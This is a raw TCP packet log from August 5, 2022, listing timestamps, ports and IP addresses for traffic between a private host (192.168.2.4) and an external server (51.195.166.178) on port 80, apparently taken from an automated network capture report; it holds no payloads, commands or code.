Aug 5, 2022 13:54:20.681045055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681087017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681091070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681129932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681137085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681169033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681180000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681211948 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681214094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681252003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681255102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681291103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681296110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681333065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681337118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681374073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681375980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681411028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681417942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681457043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681461096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681498051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681499958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681535006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681541920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681580067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681583881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681622028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681623936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681658983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681667089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681704044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681706905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681744099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681747913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681783915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681791067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681828022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681830883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681868076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681871891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681909084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681912899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681948900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681952953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.681988955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.681993961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682030916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682037115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682071924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682077885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682117939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682120085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682157040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682159901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682194948 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682202101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682243109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682255983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682282925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682296991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682323933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682375908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682393074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682432890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682435989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682473898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682476044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682513952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682537079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682554007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682557106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682595015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682625055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682635069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682645082 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682676077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682698965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682715893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682715893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682756901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682781935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682799101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682806969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682837963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682841063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682905912 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682909966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682948112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682980061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.682988882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.682997942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683027983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683041096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683068037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683092117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683104992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683108091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683149099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683192015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683198929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683231115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683233023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683270931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683281898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683310986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683335066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683356047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683377981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683419943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683459044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683497906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683505058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683535099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683537960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683579922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683609009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683619976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683630943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683655977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683660030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683696985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683701038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683737993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683739901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683777094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683780909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683820009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683820963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683856964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683861971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683900118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683902979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683939934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683943033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.683979988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.683984041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684021950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684024096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684062004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684062958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684098959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684103012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684143066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684144974 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684180021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684185982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684223890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684226990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684264898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684267044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684303045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.684307098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.684345007 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714412928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714520931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714584112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714622021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714633942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714636087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714684963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714689970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714739084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714741945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714792967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714796066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714843988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714850903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714899063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714900970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.714946985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.714953899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715001106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715006113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715054035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715055943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715101957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715107918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715156078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715159893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715205908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715214014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715260983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715281963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715331078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715332031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715378046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715420008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715468884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715475082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715522051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715526104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715570927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715576887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715625048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715631008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715677023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715681076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715727091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715734005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715780973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715785980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715832949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715837002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715882063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715888977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715938091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715940952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.715986967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.715992928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716041088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716046095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716092110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716095924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716141939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716149092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716197014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716203928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716248989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716253042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716300011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716305971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716355085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716356039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716401100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716408968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716459036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716463089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716510057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716514111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716558933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716567039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716614962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716619968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716661930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.716667891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.716706991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.897089005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.949541092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949616909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949665070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949704885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949742079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949779034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949810028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949843884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.949851036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949886084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.949892998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949903011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.949934959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.949999094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979265928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979317904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979388952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979461908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979500055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979504108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979533911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979540110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979547024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979564905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979576111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979614973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979615927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979629993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979659081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979667902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979698896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979718924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979741096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979748011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979782104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979789019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979821920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979830027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979862928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979865074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979902983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979913950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.979943991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979984999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.979984999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.980022907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.980030060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.980041981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.980063915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.980077028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.980119944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:23.980149031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:23.980209112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009274960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009326935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009366989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009407997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009418011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009448051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009455919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009463072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009468079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009493113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009505033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009532928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009546995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009573936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009588003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009630919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009632111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009671926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009685040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009712934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009727955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009753942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009768963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009794950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009809971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009835005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009844065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009875059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009885073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009915113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009926081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009957075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.009969950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.009998083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.010009050 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.010039091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.010050058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.010078907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.010087967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.010118961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.010130882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.010159016 CEST	80	49778	51.195.166.178	192.168.2.4
